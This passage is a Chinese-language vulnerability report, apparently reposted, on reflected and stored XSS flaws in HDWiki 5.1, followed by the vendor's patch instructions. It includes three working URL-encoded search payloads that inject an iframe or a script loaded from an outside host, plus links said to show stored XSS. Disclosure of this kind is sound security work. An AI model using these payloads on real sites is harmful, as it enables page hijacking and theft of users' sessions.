可csrf、劫持首页、蠕虫等,cog也在其列。
详细说明:由于偶尔原因发现cog存在wiki导致的xss可劫持首页,发现它的wiki是hdwiki的5.1版本。于是测试了其他的hdwiki发现存在同样的xss问题。
问题总结如下。
1. hdwiki的搜索有非持久xss,如:
http://www.2cto.com /index.php?search-fulltext-title-%5C%22%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1
http://www.2cto.com /index.php?search-fulltext-title-%5C%22%3E%3Cscript%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%2Fq%26%2346%3Bjs%3E--all-0-within-time-desc-1
http://www.2cto.com /index.php?search-fulltext-title-TAG%3A%5C%22%3E%5C%27%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1
2. hdwiki编辑词条的存储型xss,
http://www.2cto.com /index.php?doc-view-1572
http://www.2cto.com /thread-625-1-1.html
词条标题,词条标签,词条内容均存在服务端未过滤的问题。
3. hdwiki留言的存储型xss
修复方案:
过滤各种提交,修复编辑器,打补丁。
作者 random_
官方修复方案:
漏洞1、hdwiki编辑词条的存储型xss 漏洞
2、hdwiki的搜索有非持久xss 漏洞
3、HDWiki 任意用户密码修改漏洞
修复前须知:请提前做好代码备份工作,如您有做过二次开发,请对比代码,谨慎处理。
修复步骤:
1、请下载您对应编码版本的附件补丁包到本地并解压
2、拷贝附件中的doc.php,user.php,reference.php至/control/下面(覆盖原有文件)
3、(此步骤只针对HDWiki5.1版本的用户)拷贝附件中的editor.htm,viewdoc.htm至/view/default/下(覆盖原有文件)
4、拷贝附件中的hdwiki.js至/js/jqeditor/下(覆盖原有文件)
5、(此步骤只针对5.0UTF8版本的用户)拷贝附件中的install.php至/install/下(覆盖原有文件)
帖子内容如下: http://kaiyuan.hudong.com/bbs/viewthread.php?tid=115225&extra=page%3D1